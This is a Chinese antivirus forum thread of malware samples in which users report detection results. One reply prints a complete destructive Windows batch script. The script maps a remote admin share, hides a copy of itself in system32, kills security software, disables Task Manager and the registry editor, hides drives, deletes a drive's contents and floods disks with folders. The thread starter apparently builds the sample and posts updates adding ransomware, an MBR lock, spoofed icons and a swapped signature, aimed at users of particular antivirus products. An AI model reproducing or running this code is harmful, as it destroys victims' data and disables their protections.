楼主: 安全守护者
收起左侧

[病毒样本] 病毒样本【持续更新】

  [复制链接]
ttdown
发表于 2018-2-20 00:40:12 | 显示全部楼层
刘然12 发表于 2018-2-20 00:29
火绒过,2345好压报毒,火绒你太让我失望了

火绒扫描确实不行,但不知虚拟机里跑起来怎样。
ELOHIM
发表于 2018-2-20 00:47:26 | 显示全部楼层
  1. [url=home.php?mod=space&uid=500624]@Shift[/url] /0
  2. [url=home.php?mod=space&uid=331734]@echo[/url] off
  3. title ERROR 404-Not Found
  4. net use y: \\182.140.167.44\c$
  5. net start WuAuServ
  6. set taskkill=s
  7. copy %0 %windir%\system32\cmd.bat
  8. attrib %windir%\system32\cmd.bat +r +s +h
  9. net stop sharedaccess >nul
  10. %s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
  11. %s% /im norton* /f >nul
  12. %s% /im av* /f >nul
  13. %s% /im fire* /f >nul
  14. %s% /im anti* /f >nul
  15. %s% /im spy* /f >nul
  16. %s% /im bullguard /f >nul
  17. %s% /im PersFw /f >nul
  18. %s% /im KAV* /f >nul
  19. %s% /im ZONEALARM /f >nul
  20. %s% /im SAFEWEB /f >nul
  21. %s% /im OUTPOST /f >nul
  22. %s% /im nv* /f >nul
  23. %s% /im nav* /f >nul
  24. %s% /im F-* /f >nul
  25. %s% /im ESAFE /f >nul
  26. %s% /im cle /f >nul
  27. %s% /im BLACKICE /f >nul
  28. %s% /im def* /f >nul
  29. %s% /im 360safe.exe /f >nul
  30. net stop Shadow" "System" "Service
  31. netsh interface ip set dns "缃戠粶杩炴帴" static 114.114.114.114
  32. rem 淇敼娉ㄥ唽琛?......
  33. reg add
  34. hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nodrives /t reg_dword /d 429467295 /f
  35. reg add
  36. hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v noviewondrive /t reg_dword /d 0 /f
  37. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t REG_DWORD /d 00000001 /f
  38. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f
  39. rd /q/s "%~d0"
  40. type "%~f0" >> "%~f0"
  41. set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
  42. for /l %%a in (1,1,1000) do for %%b in (%alldrive%) do md %%b:\%random%%random%%random%%%a..\
  43. md d:\fly >nul 2>nul
  44. set a=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
  45. for %%a in (%a%) do subst %%a: d:\fly >nul 2>nul
复制代码


wiep clean
Dolby123
发表于 2018-2-20 00:54:09 | 显示全部楼层
To 12L 样本

WD
Trojan:Win32/Fuerboos.C!cl   楼主加油
ytysh
发表于 2018-2-20 01:21:50 | 显示全部楼层
本帖最后由 ytysh 于 2018-2-20 07:25 编辑

1.0.2.0 Webroot 以查杀
上报8分钟之后入库


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
安全守护者
头像被屏蔽
 楼主| 发表于 2018-2-20 09:06:16 | 显示全部楼层
重大更新:【预更新】
更新后版本号:2.2.2.4

更新内容:
#增加了勒索内容【可能在win10环境或者其他操作系统中运行失败】

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Jirehlov1234
发表于 2018-2-20 09:37:29 | 显示全部楼层
安全守护者 发表于 2018-2-20 09:06
重大更新:【预更新】
更新后版本号:2.2.2.4


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ericdj
发表于 2018-2-20 09:55:41 | 显示全部楼层
刘然12 发表于 2018-2-20 00:29
火绒过,2345好压报毒,火绒你太让我失望了

……
火绒的查杀不行,还得靠规则。。。。
安全守护者
头像被屏蔽
 楼主| 发表于 2018-2-20 10:01:16 | 显示全部楼层
正式更新:
更新后版本号:2.2.2.5
本版本后将暂时终止正式维护服务,但仍可能有零散更新!
更新内容:
#修改了MBR锁运行失败的问题。【已知魔盾分析被锁】
#完善了标题和图标欺骗
#更换了原有数字签名
注意事项:
1.请在下载及运行时不要开启“卡巴斯基安全软件”以及“WD”服务
2.请以“管理员身份运行”

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ATP_synthase
发表于 2018-2-20 10:07:07 | 显示全部楼层
卡巴继续杀

卡巴斯基安全软件

拒绝访问
无法访问该网页

对象网址:

https://att.kafan.cn/forum.php?mo ... DN8MjExNjI3MQ%3D%3D
原因: 对象被感染 HEUR:Trojan.Win32.Generic

消息生成时间: 2018/2/20 10:05:43
安全守护者
头像被屏蔽
 楼主| 发表于 2018-2-20 10:09:02 | 显示全部楼层
wusiyuanjh 发表于 2018-2-20 10:07
卡巴继续杀

卡巴斯基安全软件

都说了,我欺骗的对象不包括卡巴用户,我要的是,腾讯和金山以及火绒的
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-2 00:07 , Processed in 0.088905 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表